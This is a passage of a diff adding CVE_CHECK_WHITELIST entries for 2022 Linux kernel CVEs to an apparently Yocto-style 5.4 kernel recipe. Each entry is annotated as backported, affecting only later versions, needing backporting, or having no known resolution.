+# CVE-2022-0168 needs backporting (fixed from 5.18rc1)
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0171"
+
+# cpe-stable-backport: Backported in 5.4.173
+CVE_CHECK_WHITELIST += "CVE-2022-0185"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0264"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0286"
+
+# cpe-stable-backport: Backported in 5.4.155
+CVE_CHECK_WHITELIST += "CVE-2022-0322"
+
+# cpe-stable-backport: Backported in 5.4.175
+CVE_CHECK_WHITELIST += "CVE-2022-0330"
+
+# CVE-2022-0382 needs backporting (fixed from 5.16)
+
+# CVE-2022-0400 has no known resolution
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0433"
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-0435"
+
+# CVE-2022-0480 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.179
+CVE_CHECK_WHITELIST += "CVE-2022-0487"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-0492"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-0494"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0500"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0516"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-0617"
+
+# cpe-stable-backport: Backported in 5.4.156
+CVE_CHECK_WHITELIST += "CVE-2022-0644"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0646"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0742"
+
+# cpe-stable-backport: Backported in 5.4.53
+CVE_CHECK_WHITELIST += "CVE-2022-0812"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0847"
+
+# cpe-stable-backport: Backported in 5.4.132
+CVE_CHECK_WHITELIST += "CVE-2022-0850"
+
+# fixed-version: only affects 5.17rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0854"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0995"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-0998"
+
+# cpe-stable-backport: Backported in 5.4.185
+CVE_CHECK_WHITELIST += "CVE-2022-1011"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-1012"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1015"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-1016"
+
+# fixed-version: only affects 5.12rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1043"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1048"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-1055"
+
+# CVE-2022-1116 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1158"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-1184"
+
+# cpe-stable-backport: Backported in 5.4.169
+CVE_CHECK_WHITELIST += "CVE-2022-1195"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1198"
+
+# cpe-stable-backport: Backported in 5.4.185
+CVE_CHECK_WHITELIST += "CVE-2022-1199"
+
+# cpe-stable-backport: Backported in 5.4.190
+CVE_CHECK_WHITELIST += "CVE-2022-1204"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1205"
+
+# CVE-2022-1247 has no known resolution
+
+# CVE-2022-1263 needs backporting (fixed from 5.18rc3)
+
+# CVE-2022-1280 needs backporting (fixed from 5.15rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-1353"
+
+# cpe-stable-backport: Backported in 5.4.21
+CVE_CHECK_WHITELIST += "CVE-2022-1419"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-1462"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1508"
+
+# fixed-version: only affects 5.7rc5 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1516"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1651"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-1652"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1671"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2022-1678"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-1679"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-1729"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1734"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1786"
+
+# CVE-2022-1789 needs backporting (fixed from 5.18)
+
+# cpe-stable-backport: Backported in 5.4.192
+CVE_CHECK_WHITELIST += "CVE-2022-1836"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1852"
+
+# fixed-version: only affects 5.17rc8 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1882"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1943"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-1966"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1972"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1973"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1974"
+
+# cpe-stable-backport: Backported in 5.4.193
+CVE_CHECK_WHITELIST += "CVE-2022-1975"
+
+# fixed-version: only affects 5.18rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1976"
+
+# fixed-version: only affects 5.13rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-1998"
+
+# cpe-stable-backport: Backported in 5.4.181
+CVE_CHECK_WHITELIST += "CVE-2022-20008"
+
+# cpe-stable-backport: Backported in 5.4.165
+CVE_CHECK_WHITELIST += "CVE-2022-20132"
+
+# cpe-stable-backport: Backported in 5.4.145
+CVE_CHECK_WHITELIST += "CVE-2022-20141"
+
+# CVE-2022-20148 needs backporting (fixed from 5.16rc1)
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20153"
+
+# cpe-stable-backport: Backported in 5.4.170
+CVE_CHECK_WHITELIST += "CVE-2022-20154"
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-20158"
+
+# CVE-2022-20166 needs backporting (fixed from 5.10rc1)
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-20368"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2022-20369"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20409"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-20421"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-20422"
+
+# fixed-version: only affects 5.17rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20423"
+
+# CVE-2022-20424 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.63
+CVE_CHECK_WHITELIST += "CVE-2022-20565"
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2022-20566"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2022-20567"
+
+# fixed-version: only affects 5.7rc4 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-20568"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-20572"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2078"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21123"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21125"
+
+# cpe-stable-backport: Backported in 5.4.199
+CVE_CHECK_WHITELIST += "CVE-2022-21166"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2022-21385"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-21499"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-21505"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2153"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2196"
+
+# CVE-2022-2209 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.175
+CVE_CHECK_WHITELIST += "CVE-2022-22942"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23036"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23037"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23038"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23039"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23040"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23041"
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23042"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2308"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-2318"
+
+# CVE-2022-23222 needs backporting (fixed from 5.17rc1)
+
+# CVE-2022-2327 needs backporting (fixed from 5.12rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-2380"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-23816"
+
+# CVE-2022-23825 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.184
+CVE_CHECK_WHITELIST += "CVE-2022-23960"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-24122"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-24448"
+
+# cpe-stable-backport: Backported in 5.4.183
+CVE_CHECK_WHITELIST += "CVE-2022-24958"
+
+# cpe-stable-backport: Backported in 5.4.176
+CVE_CHECK_WHITELIST += "CVE-2022-24959"
+
+# cpe-stable-backport: Backported in 5.4.197
+CVE_CHECK_WHITELIST += "CVE-2022-2503"
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-25258"
+
+# CVE-2022-25265 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-25375"
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-25636"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2585"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2586"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-2588"
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2590"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-2602"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-26365"
+
+# cpe-stable-backport: Backported in 5.4.210
+CVE_CHECK_WHITELIST += "CVE-2022-26373"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-2639"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-26490"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-2663"
+
+# CVE-2022-26878 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-26966"
+
+# cpe-stable-backport: Backported in 5.4.182
+CVE_CHECK_WHITELIST += "CVE-2022-27223"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-27666"
+
+# CVE-2022-27672 needs backporting (fixed from 6.2)
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2785"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-27950"
+
+# cpe-stable-backport: Backported in 5.4.188
+CVE_CHECK_WHITELIST += "CVE-2022-28356"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-28388"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-28389"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-28390"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2873"
+
+# fixed-version: only affects 5.17rc3 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-28796"
+
+# cpe-stable-backport: Backported in 5.4.196
+CVE_CHECK_WHITELIST += "CVE-2022-28893"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2905"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29156"
+
+# cpe-stable-backport: Backported in 5.4.177
+CVE_CHECK_WHITELIST += "CVE-2022-2938"
+
+# cpe-stable-backport: Backported in 5.4.191
+CVE_CHECK_WHITELIST += "CVE-2022-29581"
+
+# fixed-version: only affects 5.5rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29582"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-2959"
+
+# CVE-2022-2961 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.180
+CVE_CHECK_WHITELIST += "CVE-2022-2964"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-2977"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-2978"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-29900"
+
+# cpe-stable-backport: Backported in 5.4.217
+CVE_CHECK_WHITELIST += "CVE-2022-29901"
+
+# CVE-2022-2991 needs backporting (fixed from 5.15rc1)
+
+# fixed-version: only affects 5.16rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-29968"
+
+# cpe-stable-backport: Backported in 5.4.212
+CVE_CHECK_WHITELIST += "CVE-2022-3028"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-30594"
+
+# CVE-2022-3061 needs backporting (fixed from 5.18rc5)
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3077"
+
+# fixed-version: only affects 5.10rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3078"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3103"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3104"
+
+# cpe-stable-backport: Backported in 5.4.171
+CVE_CHECK_WHITELIST += "CVE-2022-3105"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3106"
+
+# cpe-stable-backport: Backported in 5.4.187
+CVE_CHECK_WHITELIST += "CVE-2022-3107"
+
+# CVE-2022-3108 needs backporting (fixed from 5.17rc1)
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3110"
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3111"
+
+# fixed-version: only affects 5.7rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3112"
+
+# fixed-version: only affects 5.10rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3113"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3114"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-3115"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2022-3169"
+
+# fixed-version: only affects 6.0rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3170"
+
+# CVE-2022-3176 needs backporting (fixed from 5.17rc1)
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3202"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-32250"
+
+# cpe-stable-backport: Backported in 5.4.201
+CVE_CHECK_WHITELIST += "CVE-2022-32296"
+
+# CVE-2022-3238 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.189
+CVE_CHECK_WHITELIST += "CVE-2022-3239"
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-32981"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-3303"
+
+# CVE-2022-3344 needs backporting (fixed from 6.1rc7)
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33740"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33741"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33742"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-33743"
+
+# cpe-stable-backport: Backported in 5.4.204
+CVE_CHECK_WHITELIST += "CVE-2022-33744"
+
+# cpe-stable-backport: Backported in 5.4.192
+CVE_CHECK_WHITELIST += "CVE-2022-33981"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-3424"
+
+# fixed-version: only affects 5.18rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3435"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-34494"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-34495"
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2022-34918"
+
+# cpe-stable-backport: Backported in 5.4.225
+CVE_CHECK_WHITELIST += "CVE-2022-3521"
+
+# CVE-2022-3522 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3523 needs backporting (fixed from 6.1rc1)
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3524"
+
+# fixed-version: only affects 5.13rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3526"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3531"
+
+# fixed-version: only affects 6.1rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3532"
+
+# CVE-2022-3533 has no known resolution
+
+# CVE-2022-3534 needs backporting (fixed from 6.2rc1)
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3535"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3541"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3542"
+
+# fixed-version: only affects 5.15rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3543"
+
+# CVE-2022-3544 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.228
+CVE_CHECK_WHITELIST += "CVE-2022-3545"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3564"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3565"
+
+# CVE-2022-3566 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3567 needs backporting (fixed from 6.1rc1)
+
+# cpe-stable-backport: Backported in 5.4.198
+CVE_CHECK_WHITELIST += "CVE-2022-3577"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-3586"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3594"
+
+# CVE-2022-3595 needs backporting (fixed from 6.1rc1)
+
+# CVE-2022-3606 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.207
+CVE_CHECK_WHITELIST += "CVE-2022-36123"
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3619"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-3621"
+
+# cpe-stable-backport: Backported in 5.4.228
+CVE_CHECK_WHITELIST += "CVE-2022-3623"
+
+# CVE-2022-3624 needs backporting (fixed from 6.0rc1)
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3625"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-3628"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-36280"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3629"
+
+# fixed-version: only affects 5.19rc6 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3630"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3633"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-3635"
+
+# CVE-2022-3636 needs backporting (fixed from 5.19rc1)
+
+# fixed-version: only affects 5.19 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3640"
+
+# CVE-2022-36402 needs backporting (fixed from 6.5)
+
+# CVE-2022-3642 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.227
+CVE_CHECK_WHITELIST += "CVE-2022-3643"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-3646"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-3649"
+
+# cpe-stable-backport: Backported in 5.4.208
+CVE_CHECK_WHITELIST += "CVE-2022-36879"
+
+# cpe-stable-backport: Backported in 5.4.209
+CVE_CHECK_WHITELIST += "CVE-2022-36946"
+
+# cpe-stable-backport: Backported in 5.4.233
+CVE_CHECK_WHITELIST += "CVE-2022-3707"
+
+# CVE-2022-38096 has no known resolution
+
+# CVE-2022-38457 needs backporting (fixed from 6.2rc4)
+
+# CVE-2022-3903 needs backporting (fixed from 6.1rc2)
+
+# fixed-version: only affects 5.18 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3910"
+
+# CVE-2022-39188 needs backporting (fixed from 5.19rc8)
+
+# cpe-stable-backport: Backported in 5.4.244
+CVE_CHECK_WHITELIST += "CVE-2022-39189"
+
+# fixed-version: only affects 5.9rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-39190"
+
+# fixed-version: only affects 5.18rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-3977"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-39842"
+
+# CVE-2022-40133 needs backporting (fixed from 6.2rc4)
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-40307"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-40476"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-40768"
+
+# cpe-stable-backport: Backported in 5.4.213
+CVE_CHECK_WHITELIST += "CVE-2022-4095"
+
+# cpe-stable-backport: Backported in 5.4.252
+CVE_CHECK_WHITELIST += "CVE-2022-40982"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-41218"
+
+# cpe-stable-backport: Backported in 5.4.211
+CVE_CHECK_WHITELIST += "CVE-2022-41222"
+
+# fixed-version: only affects 5.19rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4127"
+
+# fixed-version: only affects 5.17rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4128"
+
+# cpe-stable-backport: Backported in 5.4.231
+CVE_CHECK_WHITELIST += "CVE-2022-4129"
+
+# fixed-version: only affects 5.17rc2 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4139"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-41674"
+
+# CVE-2022-41848 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-41849"
+
+# cpe-stable-backport: Backported in 5.4.220
+CVE_CHECK_WHITELIST += "CVE-2022-41850"
+
+# cpe-stable-backport: Backported in 5.4.190
+CVE_CHECK_WHITELIST += "CVE-2022-41858"
+
+# fixed-version: only affects 5.16rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42328"
+
+# fixed-version: only affects 5.16rc7 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42329"
+
+# cpe-stable-backport: Backported in 5.4.215
+CVE_CHECK_WHITELIST += "CVE-2022-42432"
+
+# CVE-2022-4269 needs backporting (fixed from 6.3rc1)
+
+# cpe-stable-backport: Backported in 5.4.212
+CVE_CHECK_WHITELIST += "CVE-2022-42703"
+
+# cpe-stable-backport: Backported in 5.4.219
+CVE_CHECK_WHITELIST += "CVE-2022-42719"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-42720"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-42721"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-42722"
+
+# cpe-stable-backport: Backported in 5.4.224
+CVE_CHECK_WHITELIST += "CVE-2022-42895"
+
+# cpe-stable-backport: Backported in 5.4.226
+CVE_CHECK_WHITELIST += "CVE-2022-42896"
+
+# cpe-stable-backport: Backported in 5.4.218
+CVE_CHECK_WHITELIST += "CVE-2022-43750"
+
+# fixed-version: only affects 5.8rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4378"
+
+# fixed-version: only affects 5.6rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-4379"
+
+# cpe-stable-backport: Backported in 5.4.230
+CVE_CHECK_WHITELIST += "CVE-2022-4382"
+
+# fixed-version: only affects 5.11rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-43945"
+
+# CVE-2022-44032 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-44033 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-44034 needs backporting (fixed from 6.4rc1)
+
+# CVE-2022-4543 has no known resolution
+
+# fixed-version: only affects 5.12rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-45869"
+
+# CVE-2022-45884 has no known resolution
+
+# CVE-2022-45885 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45886"
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45887"
+
+# fixed-version: only affects 5.14rc1 onwards
+CVE_CHECK_WHITELIST += "CVE-2022-45888"
+
+# cpe-stable-backport: Backported in 5.4.246
+CVE_CHECK_WHITELIST += "CVE-2022-45919"
+
+# cpe-stable-backport: Backported in 5.4.229
+CVE_CHECK_WHITELIST += "CVE-2022-45934"
+
+# cpe-stable-backport: Backported in 5.4.213
